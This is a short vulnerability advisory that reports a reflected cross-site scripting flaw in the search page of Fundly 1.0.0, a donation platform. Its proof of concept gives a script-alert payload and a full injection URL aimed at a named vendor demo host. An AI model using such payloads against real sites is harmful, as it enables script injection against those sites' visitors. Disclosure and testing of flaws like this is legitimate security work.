======================================== ============================================================================================================================
| # Title : Fundly 1.0.0 XSS Vulnerability |
| # Author : indoushka |
| # email : indoushka4ever@gmail.com |
| # Tested on : windows 10 FranASSais V.(Pro) |
| # Version : 1.0.0 |
| # Vendor : https://codecanyon.net/item/fundly-a-donation-platform/21225201?s_rank=4 |
| # Dork : n/a |
============================================================================================================================
poc :
[+] Dorking Adegn Google Or Other Search Enggine
[+] in Search box use payload : <script>alert(/indoushka/);</script>
http://fundly.techvill.net/search?keyword=1%3C/title%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================
Fundly 1.0.0 Cross Site Scripting
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 363